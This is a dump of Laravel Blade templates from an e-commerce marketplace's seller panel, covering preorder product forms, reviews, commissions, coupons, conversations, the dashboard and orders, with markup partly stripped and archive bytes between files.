    {{translate('Product Information')}}
    {{-- Product Name --}}
    {{translate('Enter a descriptive name for the product. [e.g. "Wireless Bluetooth Headphones"]')}}
    {{ translate('Choose the product\'s brand from the list. [e.g. "Sony"]') }}
    {{translate('Specify the unit of measurement for the product. [e.g. "Piece" or "kg"]')}}
    {{-- Tags --}}
    {{translate('Add keywords to help customers find this product. [e.g. "wireless, headphones, audio"]')}}
    {{-- Barcode --}} @if (addon_is_activated('pos_system'))
    {{translate('Enter the product’s barcode or SKU for inventory tracking. [e.g. "1234567890123"]')}}
    @endif
    {{translate('Product Files & Media')}}
    {{-- Gallery Image --}}
    {{translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload multiple images, each 600x400 pixels. [e.g. Images showing products from different angles.]')}}
    {{-- Thumbnail Image --}}
    {{translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload a primary image at 300x200 pixels for quick preview. [e.g. A front view of the product.]')}}
    {{-- Video Provider --}}
    {{translate('Select the video platform hosting the product video. [e.g. "YouTube"]')}}
    {{-- Video Link --}}
    {{ translate('Provide the link to the product video. [e.g. "https://www.youtube.com/watch?v=12345"]') }}
    {{translate('Product Description')}}
    {{translate('Write a detailed overview of the product, including features. [e.g. "These wireless Bluetooth headphones offer premium sound quality, noise cancellation, and a comfortable design for all-day use."]')}}
    {{translate('Product Price & Discounts')}}
    {{translate('Enter the price per unit. [e.g. "$49.99"]')}}


    {{translate('Choose start and end dates for a discount period. [e.g. "01/01/2024 - 01/15/2024"]')}}
    {{translate('Specify the discount percentage or amount. [e.g. "10%" or "$5.00"]')}}

    {{translate('SEO Meta Tags')}}
    {{translate('Add a title for SEO purposes to improve search visibility. [e.g. "Premium Wireless Bluetooth Headphones"]')}}
    {{translate('Provide a short SEO-friendly description. [e.g. "High-quality Bluetooth headphones with noise cancellation."]')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{-- Right side --}}
    {{-- Categories --}}
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    {{translate('Product Settings')}}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{translate('Indicate if the product is in stock and ready to ship.')}}
    {{translate('Set a date when the product will become available. Example: "01/20/2024"')}}
    @if (addon_is_activated('refund_request'))
    {{translate('Refund')}}
    @endif
    {{translate('Shipping')}}
    {{translate('Shipping Configuration')}}
    {{translate('Cash On Delivery')}}
    @if (addon_is_activated('gst_system'))
    {{translate('HSN & GST')}}
    {{translate('Harmonized System Nomenclature (HSN) code for tax purposes. [e.g. "8517"]')}}
    {{translate('Goods and Services Tax (GST) rate percentage for this product. [e.g. "18%"]')}}
    @else
    {{translate('VAT & Tax')}}
    @foreach($taxes as $tax)
    {{translate('Enter the vat & tax rate percentage for this product. [e.g. "8%"]')}}
    @endforeach
    @endif
    {{translate('More Products to Preorder')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    {{translate('Frequently Bought Products')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    {{-- Select Category for Frequently Bought Product --}}
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Pre Order Product Select Model --}} @include('preorder.common.models.pre_order_product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @endsection @section('script') @endsectionPK�N]�(�9�8�8-views/preorder/seller/products/edit.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    {{translate('Update Product Information')}}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf @method('PUT')
    {{-- Product Name --}}
    {{translate('Enter a descriptive name for the product. [e.g. "Wireless Bluetooth Headphones"]')}}
    {{-- Brand --}}
    {{ translate('Choose the product\'s brand from the list. [e.g. "Sony"]') }}
    {{-- Unit --}}
    {{translate('Specify the unit of measurement for the product. [e.g. "Piece" or "kg"]')}}
    {{-- Minimum Purchase Qty --}} {{-- Tags --}}
    {{translate('Add keywords to help customers find this product. [e.g. "wireless, headphones, audio"]')}}
    {{-- Barcode --}} @if (addon_is_activated('pos_system'))
    {{translate('Enter the product’s barcode or SKU for inventory tracking. [e.g. "1234567890123"]')}}
    @endif
    {{translate('Product Files & Media')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload multiple images, each 600x400 pixels. [e.g. Images showing products from different angles.]')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload a primary image at 300x300 pixels for quick preview. [e.g. A front view of the product.]')}}
    {{translate('Select the video platform hosting the product video. [e.g. "YouTube"]')}}
    {{ translate('Provide the link to the product video. [e.g. "https://www.youtube.com/watch?v=12345"]') }}
    {{translate('Product Description')}}
    {{translate('Write a detailed overview of the product, including features. [e.g. "These wireless Bluetooth headphones offer premium sound quality, noise cancellation, and a comfortable design for all-day use."]')}}
    {{translate('Product Price & Discounts')}}
    {{translate('Enter the price per unit. [e.g. "$49.99"]')}}

    {{translate('Specify the required prepayment amount for pre-orders. [e.g. "$10.00"]')}}

    @php $start_date = date('d-m-Y H:i:s', $product->discount_start_date); $end_date = date('d-m-Y H:i:s', $product->discount_end_date); @endphp
    discount_start_date && $product->discount_end_date) value="{{ $start_date.' to '.$end_date }}" @endif placeholder="{{translate('Select Date')}}" data-time-picker="true" data-format="DD-MM-Y HH:mm:ss" data-separator=" to " autocomplete="off"> {{translate('Choose start and end dates for a discount period. [e.g. "01/01/2024 - 01/15/2024"]')}}
    {{translate('Specify the discount percentage or amount. [e.g. "10%" or "$5.00"]')}}

    {{translate('Generate ')}}
    @php $start_date = date('d-m-Y H:i:s', $coupon?->coupon_start_date); $end_date = date('d-m-Y H:i:s', $coupon?->coupon_end_date); @endphp
    coupon_start_date && $coupon?->coupon_end_date) value="{{ $start_date.' to '.$end_date }}" @endif placeholder="{{translate('Select Date')}}" data-time-picker="true" data-format="DD-MM-Y HH:mm:ss" data-separator=" to " autocomplete="off"> {{translate('Choose start and end dates for a coupon discount period. [e.g. "01/01/2024 - 01/15/2024"]')}}
    {{translate('Specify the coupon amount percentage or amount. [e.g. "10%" or "$5.00"]')}}
    {{translate('SEO Meta Tags')}}
    {{translate('Add a title for SEO purposes to improve search visibility. [e.g. "Premium Wireless Bluetooth Headphones"]')}}
    {{translate('Provide a short SEO-friendly description. [e.g. "High-quality Bluetooth headphones with noise cancellation."]')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{-- Right side --}}
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
    @php $old_categories = $product->categories()->pluck('category_id')->toArray(); @endphp
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    {{translate('Product Settings')}}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{translate('Indicate if the product is in stock and ready to ship.')}}
    {{translate('Set a date when the product will become available. Example: "01/20/2024"')}}
    @if (addon_is_activated('refund_request'))
    {{translate('Refund')}}
    show_refund_note == 1 ? 'checked' : '' }}>
    @if($refund?->note != null)
    {{ $refund->note->getTranslation('description') ?? '' }}
    @endif
    @endif
    {{translate('Shipping')}}
    {{translate('Shipping Configuration')}}
    show_shipping_time == 1 ? 'checked' : ''}}>
    show_shipping_note == 1 ? 'checked' : ''}}>
    @if($shipping?->note != null)
    {{ $shipping->note->getTranslation('description') ?? '' }}
    @endif
    {{translate('Cash On Delivery')}}
    prepayment_needed == 1 ? 'checked' : '' }}>
    show_cod_note == 1 ? 'checked' : '' }}>
    @if($cod?->note != null)
    {{ $cod->note->getTranslation('description') ?? '' }}
    @endif
    @if (addon_is_activated('gst_system'))
    {{translate('HSN & GST')}}
    {{translate('Harmonized System Nomenclature (HSN) code for tax purposes. [e.g. "8517"]')}}
    {{translate('Goods and Services Tax (GST) rate percentage for this product. [e.g. "18%"]')}}
    @else
    {{translate('VAT & Tax')}}
    @foreach($taxes as $tax) @php @endphp
    {{translate('Enter the vat & tax rate percentage for this product. [e.g. "8%"]')}}
    @endforeach
    @endif
    {{translate('More Products to Preorder')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    @php $more_product_ids = json_decode($product->more_products, true); if (is_array($more_product_ids) && !empty($more_product_ids)) { $more_products = \App\Models\PreorderProduct::whereIn('id', $more_product_ids)->get(); } else { $more_products = collect(); // Empty collection if no valid IDs } @endphp @if(count($more_products) > 0)
    @foreach($more_products as $more_product) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $more_product->getTranslation('product_name') }}

    {{ $more_product->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{translate('Frequently Bought Products')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    frequently_bought_type == 'product') checked @endif >
    frequently_bought_type == 'category') checked @endif >
    @php $frequently_bought_product_ids = json_decode($product->frequently_bought_product, true); if (is_array($frequently_bought_product_ids) && !empty($frequently_bought_product_ids)) { $fq_bought_products = \App\Models\Product::whereIn('id', $frequently_bought_product_ids)->get(); } else { $fq_bought_products = collect(); // Empty collection if no valid IDs } @endphp @if(count($fq_bought_products) > 0)
    @foreach($fq_bought_products as $fQBproduct) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{translate('Options') }}

    {{ translate('Image')}}

    {{ $fQBproduct->getTranslation('name') }}

    {{ $fQBproduct->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{-- Select Category for Frequently Bought Product --}}
    @php $fqCategory = $product->frequently_bought_category != null ? $product->frequently_bought_category : null; @endphp
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Pre Order Product Select Model --}} @include('preorder.common.models.pre_order_product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @endsection @section('script') @endsectionPK�N]�:�\X\X.views/preorder/seller/products/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Preorder Products') }}

    @if (addon_is_activated('seller_subscription'))
    {{ max(0, auth()->user()->shop->preorder_product_upload_limit - auth()->user()->preorderProducts()->count()) }}
    {{ translate('Remaining Uploads') }}
    @endif @if (addon_is_activated('seller_subscription')) @php $seller_package = \App\Models\SellerPackage::find(Auth::user()->shop->seller_package_id); @endphp @endif
    {{ translate('All Preorder Products') }}
    {{ translate('Total Products') }}({{ $allProducts }}) {{ translate('Published') }}({{ $publishedProductCount }}) {{ translate('Unpublished') }}({{ $unpublishedProductCount }}) {{ translate('Discounted') }}({{ $discountedProductCount }})
    @if(get_setting('product_approve_by_admin')) @endif @foreach ($products as $key => $product) @if(get_setting('product_approve_by_admin')) @endif @endforeach
    {{ translate('Image') }} {{ translate('Product details') }} {{ translate('Product details') }} {{ translate('Price settings') }} {{ translate('Discount Settings') }} {{ translate('Availability') }} {{ translate('Orders') }} {{ translate('Status') }}{{ translate('Approval') }}{{ translate('Actions') }}
    Image
    {{ Str::limit($product?->getTranslation('product_name'), 50, ' ...') }}
    {{ translate('Category') }} {{ $product->category?->name }}
    {{ translate('Product Created :') . $product->created_at->format('d.m.Y') }}
    {{ translate('Min Purchase Qty') }} {{ $product->min_qty . ' ' . $product->unit }}
    {{ translate('Refund') }} {{ $product->is_refundable ? 'Refundable' : 'Not Refundable' }}
    {{ translate('Price') }} {{ $product->unit_price . ' / ' . $product->unit }} {{ translate('Fixed') }}
    @if($product->is_prepayment)
    {{ translate('Prepayment') }} {{ $product->preorder_prepayment?->prepayment_amount }} {{ translate('Needed') }}
    @endif
    @if($product->discount > 0)
    -{{ $product->discount_type == 'flat' ? single_price($product->discount) : $product->discount.'%' }}
    @endif
    @if($product->is_available || $product->available_date != null)
    @if($product->is_available) {{ translate('Available now') }} @elseif($product->available_date != null) {{ $product->available_date }} {{ translate('Approx') }} @endif
    @endif
    {{ translate('PreOrder') }} @if($product->is_prepayment) {{ $product->preorder->where('request_preorder_status',2)->whereIn('prepayment_confirm_status',[0,1])->count() }} @else {{ $product->preorder->where('request_preorder_status',2)->whereIn('final_order_status',[0, 1])->count() }} @endif
    {{ translate('Final Order') }} {{ $product->preorder->where('final_order_status', 2)->count() }}
    {{ translate('Publish') }}
    @if($product->is_approved == 1) {{ translate('Yes')}} @else {{ translate('No')}} @endif @if($product->preorder->count() == 0) @endif
    {{ $products->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsection PK�N]>�q�^ ^ 3views/preorder/seller/product_query/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Product Queries') }}
    @foreach ($queries as $key => $query) @endforeach
    # {{ translate('User Name') }} {{ translate('Product Name') }} {{ translate('Question') }} {{ translate('Reply') }} {{ translate('status') }} {{ translate('Options') }}
    {{ $queries->firstItem() + $key }} @if(isset($query->user)) {{ $query->user->name }} @else {{ translate('Customer Not found') }} @endif @if(isset($query->preorderProduct)) {{ $query->preorderProduct->getTranslation('product_name') }} @else {{ translate('Product Not found') }} @endif {{ Str::limit($query->question, 100) }} {{ Str::limit($query->reply, 100) }} {{ $query->reply == null ? translate('Not Replied') : translate('Replied') }}
    {{ $queries->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]�\A& & 2views/preorder/seller/product_query/show.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ $query->preorderProduct->getTranslation('product_name') }}
    • user != null) src="{{ uploaded_asset($query->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      @if ($query->user != null) {{ $query->user->name }} @endif

      {{ $query->created_at->diffForHumans() }}

      {{ strip_tags($query->question) }}

    @if (Auth::user()->id == $query->seller_id)
    @method('put') @csrf

    @endif
    @endsection PK�N]is����4views/preorder/seller/product_review/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{translate('All Rating & Reviews')}}


    {{ translate('Product Review & Ratings') }}
    @foreach($products as $key => $product) @endforeach
    # {{translate('Product Name')}} {{translate('Rating')}} {{translate('Reviews')}} {{translate('Options')}}
    {{ ($key+1) + ($products->currentPage() - 1)*$products->perPage() }}
    Image
    {{ $product->getTranslation('product_name') }}
    {{ $product->rating }} {{ $product->preorderProductreviews->count()}} @if($product->preorderProductreviews()->where('viewed',0)->count() > 0) {{ translate('new') }} @endif
    {{ $products->appends(request()->input())->links() }}
    @endsection @section('script') @endsectionPK�N]�V6Y��=views/preorder/seller/product_review/review_details.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{translate('Detail Reviews')}}


    Image
    {{ $product->getTranslation('product_name') }}

    {{ strtoupper(translate('Rating')) }}

    {{ $product->rating }}

    @for ($i=0; $i < $product->rating; $i++) @endfor @for ($i=0; $i < 5-$product->rating; $i++) @endfor


    {{ $preorder_product_reviews->count().' '.translate('Reviews') }}

    @foreach($preorder_product_reviews as $key => $review) @endforeach
    # {{ strtoupper(translate('Customer')) }} {{ strtoupper(translate('Rating')) }} {{ strtoupper(translate('Comment')) }} {{ strtoupper(translate('Published')) }}
    {{ ($key+1) + ($preorder_product_reviews->currentPage() - 1)*$preorder_product_reviews->perPage() }} @php $customerName = $review->user != null ? $review->user->name : translate('Customer Not Found'); $customerAvatar = $review->user != null ? uploaded_asset($review->user->avatar_original) : static_asset('assets/img/avatar-place.png'); @endphp
    Image
    {{ $customerName }}
    {{ $review->rating }} {{ $review->comment }} @if($review->photos != null)
    @foreach (explode(',', $review->photos) as $photo) @endforeach
    @endif
    {{ date("j F, Y", strtotime($review->created_at)) }}
    @if ($review->status == 1) {{ translate('Published') }} @else {{ translate('Unpublished') }} @endif
    {{ $preorder_product_reviews->appends(request()->input())->links() }}
    @endsection PK�N]��(�� � .views/preorder/seller/settings/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Preorder Instructions') }}
    @csrf @php $shop = auth()->user()->shop; @endphp
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endsectionPK�N]f:[�] ] .views/seller/categoryWise_commission.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Categories') }}
    @foreach($categories as $key => $category) @endforeach
    # {{translate('Icon')}} {{translate('Name')}} {{ translate('Parent Category') }} {{ translate('Commission Rate') }}
    {{ ($key+1) + ($categories->currentPage() - 1)*$categories->perPage() }} @if($category->icon != null) {{translate('icon')}} @else — @endif {{ $category->getTranslation('name') }} @if($category->digital == 1) {{translate('Digital')}} @endif @php $parent = \App\Models\Category::where('id', $category->parent_id)->first(); @endphp @if ($parent != null) {{ $parent->getTranslation('name') }} @else — @endif {{$category->commision_rate}} %
    {{ $categories->appends(request()->input())->links() }}
    @endsectionPK�N]��kk/views/seller/commission_history/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content') @if(get_setting('vendor_commission_activation') == 1)
    @if(get_setting('seller_commission_type') == 'fixed_rate')

    {{ translate('You are Under Fixed Commission. Commission Rate') }} : {{ get_setting('vendor_commission') }} %

    @elseif(get_setting('seller_commission_type') == 'seller_based')

    {{ translate('You are Under Seller Based Commission. Commission Rate') }} : {{ \App\Models\Shop::where('user_id', auth()->user()->id)->first()->commission_percentage }} %

    @elseif(get_setting('seller_commission_type') == 'category_based')

    {{ translate('You are under Category Wise commission. See the commission details ') }} {{ translate('Here') }}

    @endif
    @endif
    {{ translate('Commission History') }}
    @foreach ($commission_history as $key => $history) @endforeach
    # {{ translate('Order Code') }} {{ translate('Admin Commission') }} {{ translate('Earning') }} {{ translate('Created At') }}
    {{ ($key+1) }} @if(isset($history->order)) {{ $history->order->code }} @if (addon_is_activated('pos_system') && $history->order->order_from == 'pos') {{ translate('POS') }} @endif @else {{ translate('Order Deleted') }} @endif {{ $history->admin_commission }} {{ $history->seller_earning }} {{ $history->created_at }}
    {{ $commission_history->links() }}
    @endsection @section('script') @endsection PK�N]�[\�00*views/seller/conversations/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Conversations')}}
      @foreach ($conversations as $key => $conversation) @if ($conversation->receiver != null && $conversation->sender != null)
    • @if (Auth::user()->id == $conversation->sender_id) receiver->avatar_original == null) src="{{ static_asset('assets/img/avatar-place.png') }}" @else src="{{ uploaded_asset($conversation->receiver->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @else sender->avatar_original == null) src="{{ static_asset('assets/img/avatar-place.png') }}" @else src="{{ uploaded_asset($conversation->sender->avatar_original) }}" @endif class="rounded-circle" onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif

      @if (Auth::user()->id == $conversation->sender_id) {{ $conversation->receiver->name }} @else {{ $conversation->sender->name }} @endif
      {{ date('h:i:m d-m-Y', strtotime($conversation->messages->last()->created_at)) }}

      n. {{ $conversation->title }} @if ((Auth::user()->id == $conversation->sender_id && $conversation->sender_viewed == 0) || (Auth::user()->id == $conversation->receiver_id && $conversation->receiver_viewed == 0)) {{ translate('New') }} @endif

      {{ $conversation->messages->last()->message }}

    • @endif @endforeach
    {{ $conversations->links() }}
    @endsection PK�N]�W�:z z )views/seller/conversations/show.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Conversations With ')}} @if ($conversation->sender_id == Auth::user()->id && $conversation->receiver->shop != null) {{ $conversation->receiver->shop->name }} @endif
    #{{ $conversation->title }} ( {{ translate('Between you and') }} @if ($conversation->sender_id == Auth::user()->id) {{ $conversation->receiver->name }} @else {{ $conversation->sender->name }} @endif )
    {{--
      @foreach($conversation->messages as $message)
    • user != null) src="{{ uploaded_asset($message->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      @if ($message->user != null) {{ $message->user->name }} @endif

      {{$message->created_at}}

      {{ $message->message }}

    • @endforeach
    --}}
    @include('frontend.partials.messages', ['conversation', $conversation])
    @csrf
    @endsection @section('script') @endsection PK�N]TW�?� � %views/seller/coupons/create.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Add Your Coupon') }}

    {{translate('Coupon Information Adding')}}
    @csrf @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @endsection @section('script') @endsection PK�N]��hV  #views/seller/coupons/edit.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Edit Your Coupon') }}

    {{translate('Coupon Information Update')}}

    @csrf @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @endsection @section('script') @endsection PK�N]���ZD D $views/seller/coupons/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Coupons') }}

    {{ translate('All Coupons') }}
    @foreach($coupons as $key => $coupon) @endforeach
    # {{translate('Code')}} {{translate('Type')}} {{translate('Start Date')}} {{translate('End Date')}} {{translate('Options')}}
    {{$key+1}} {{$coupon->code}} @if ($coupon->type == 'cart_base') {{ translate('Cart Base') }} @elseif ($coupon->type == 'product_base') {{ translate('Product Base') }} @endif {{ date('d-m-Y', $coupon->start_date) }} {{ date('d-m-Y', $coupon->end_date) }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]��e�� views/seller/dashboard.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content') @if(addon_is_activated('gst_system') && !auth()->user()->shop->gst_verification)

    {{ translate('GST is being enabled on our platform. Please upload and complete the required documents from ') }} {{ translate('here') }}. {{translate('Products will not be published unless the form is completed and HSN codes and GST values are properly assigned.')}}

    @endif @php $authUser = auth()->user(); @endphp

    {{ translate('Products') }}

    {{ \App\Models\Product::where('user_id', $authUser->id)->count() }}

    {{ translate('Rating') }}

    {{ $authUser->shop?->rating }}

    {{ translate('Followers').' '.$authUser->shop?->followers()->count() }}

    {{ translate('Custom Followers').' '.$authUser->shop?->custom_followers }}

    {{ translate('Total Order') }}

    {{ \App\Models\Order::where('seller_id', $authUser->id)->where('delivery_status', 'delivered')->count() }}

    {{ translate('Total Sales') }}

    @php $orderDetails = \App\Models\OrderDetail::where('seller_id', $authUser->id)->get(); $total = 0; foreach ($orderDetails as $key => $orderDetail) { if ($orderDetail->order != null && $orderDetail->order->payment_status == 'paid') { $total += $orderDetail->price; } } @endphp {{ single_price($total) }}

    {{ translate('Sales Stat') }}
    {{ translate('Sold Amount') }}

    {{ translate('Your Sold Amount (Current month)') }}

    {{ single_price($this_month_sold_amount) }}

    {{ translate('Last Month') }}: {{ single_price($previous_month_sold_amount) }}

    {{ translate('Category wise product count') }}

      @foreach (\App\Models\Category::all() as $key => $category) @php $cat_products = \App\Models\Product::where('user_id', $authUser->id)->where('category_id',$category->id)->count(); @endphp @if ($cat_products > 0)
    • {{ $category->getTranslation('name') }} {{ $cat_products }}
    • @endif @endforeach
    {{ translate('Orders') }}

    {{ translate('This Month') }}

    {{ translate('New Order') }}

    {{ $this_month_pending_orders }}

    {{ translate('Cancelled') }}

    {{ $this_month_cancelled_orders }}

    {{ translate('On Delivery') }}

    {{ $this_month_on_the_way_orders }}

    {{ translate('Delivered') }}

    {{ $this_month_delivered_orders }}

    @if (addon_is_activated('seller_subscription'))
    {{ translate('Purchased Package') }}
    @if ($authUser->shop?->seller_package)
    {{ translate('Current Package') }}:
    {{ $authUser->shop->seller_package->name }}

    {{ translate('Product Upload Limit') }}: {{ $authUser->shop->product_upload_limit }} {{ translate('Times') }}

    @if(addon_is_activated('preorder'))

    {{ translate('Preorder Upload Limit') }}: {{ $authUser->shop->preorder_product_upload_limit }} {{ translate('Times') }}

    @endif

    {{ translate('Package Expires at') }}: {{ $authUser->shop->package_invalid_at }}

    @else
    {{ translate('Package Not Found') }}
    @endif
    @endif
    @if ($authUser->shop?->verification_status == 0) @else
    @endif
    @if(get_setting('vendor_commission_activation') == 1)
    {{ translate('Commission Type & Rate') }}

      @if(get_setting('seller_commission_type') == 'fixed_rate')
    • {{ translate('You are Under Fixed Commission. Commission Rate') }} {{ get_setting('vendor_commission') }} %
    • @elseif(get_setting('seller_commission_type') == 'seller_based')
    • {{ translate('You are Under Seller Based Commission. Commission Rate') }} {{ \App\Models\Shop::where('user_id', $authUser->id)->first()->commission_percentage }} %
    • @elseif(get_setting('seller_commission_type') == 'category_based')
    • {{ translate('You are Under Category Wise Commission Rate ') }} {{ translate('Details') }}
    • @endif
    @else
    {{ translate('Commission Type & Rate') }}

    • {{ translate('Currently No Commeision System is Set by Admin') }}
    @endif
    {{ translate('Shop Settings') }}
    {{ translate('Go to setting') }}
    {{ translate('Payment Settings') }}
    {{ translate('Configure Now') }}
    {{ translate('Top 12 Products') }}
    @endsection @section('modal') @endsection @section('script') @if(addon_is_activated('portfolio_system') && ($authUser->shop?->verification_status == 0)) @endif @endsectionPK�N]�nT �&�&%views/seller/inc/seller_nav.blade.phpnu�[���
    @if (addon_is_activated('pos_system')) @endif
    {{-- language --}} @php if(Session::has('locale')){ $locale = Session::get('locale', Config::get('app.locale')); } else{ $locale = env('DEFAULT_LANGUAGE'); } @endphp
    PK�N]����v�v)views/seller/inc/seller_sidenav.blade.phpnu�[���
    @if (optional(Auth::user()->shop)->logo != null) {{ get_setting('site_name') }} @else {{ get_setting('site_name') }} @endif

    {{ optional(Auth::user()->shop)->name }}

    {{ Auth::user()->email }}

    PK�N]��[��!�!"views/seller/layouts/app.blade.phpnu�[��� @if(\App\Models\Language::where('code', Session::get('locale', Config::get('app.locale')))->first()->rtl == 1) @else @endif {{ get_setting('website_name').' | '.get_setting('site_motto') }} @if(\App\Models\Language::where('code', Session::get('locale', Config::get('app.locale')))->first()->rtl == 1) @endif
    @include('seller.inc.seller_sidenav')
    @include('seller.inc.seller_nav')
    @yield('panel_content')
    @include('modals.bulk_action_modal') @yield('modal') @yield('script') PK�N]�_�  4views/seller/money_withdraw_requests/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Money Withdraw') }}

    {{ single_price(Auth::user()->shop->admin_to_pay) }}
    {{ translate('Pending Balance') }}
    {{ translate('Send Withdraw Request') }}
    {{ translate('Withdraw Request history')}}
    @foreach ($seller_withdraw_requests as $key => $seller_withdraw_request) @endforeach
    # {{ translate('Date') }} {{ translate('Amount')}} {{ translate('Status')}} {{ translate('Message')}}
    {{ $key+1 }} {{ date('d-m-Y', strtotime($seller_withdraw_request->created_at)) }} {{ single_price($seller_withdraw_request->amount) }} @if ($seller_withdraw_request->status == 1) {{ translate('Paid')}} @else {{ translate('Pending')}} @endif {{ $seller_withdraw_request->message }}
    {{ $seller_withdraw_requests->links() }}
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]��`�[["views/seller/note/create.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Note Information') }}
    @csrf
    @endsection PK�N]�k�/! ! views/seller/note/edit.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Note Information') }}
    @csrf
    @endsection PK�N]��\\!views/seller/note/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('All Notes') }}

    @if(get_setting('seller_can_add_note')) @endcan
    {{ translate('notes') }}
    @foreach ($notes as $key => $note) @php $user = auth()->user(); @endphp @endforeach
    # {{ translate('User') }} {{ translate('Type') }} {{ translate('Description') }} {{ translate('Options') }}
    {{ $key + 1 + ($notes->currentPage() - 1) * $notes->perPage() }} {{ $note->user_id == $user->id ? $user->shop->name : get_setting('site_name') }} {{ translate($note->note_type) }}

    {{ $note->getTranslation('description') }}

    @if($note->user_id == auth()->id()) @endif
    {{ $notes->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]����)views/seller/notification/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{translate('Notifications')}}
    {{ $notifications->links() }}
    @endsection @section('script') @endsection PK�N]� ���2�2#views/seller/orders/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{$order_types}}

    @if(Route::currentRouteName() != 'unpaid_orders.index')
    @endif
    @endsection @section('modal') @include('modals.loading_modal')
    @endsection @section('script') @endsection PK�N]ϱ���d�d"views/seller/orders/show.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Order Details') }}

    @php $delivery_status = $order->delivery_status; $payment_status = $order->payment_status; $first_order = $order->orderDetails->first(); @endphp @if (get_setting('product_manage_by_admin') == 0)
    @if (addon_is_activated('offline_payment') == 1 && $order->manual_payment == 1 && $payment_status == 'unpaid' && $order->payment_type != 'cash_on_delivery') @else @endif
    @if ($delivery_status != 'delivered' && $delivery_status != 'cancelled') @else @endif
    @endif
    @if(json_decode($order->shipping_address))
    {{ json_decode($order->shipping_address)->name }}
    {{ json_decode($order->shipping_address)->email }}
    {{ json_decode($order->shipping_address)->phone }}
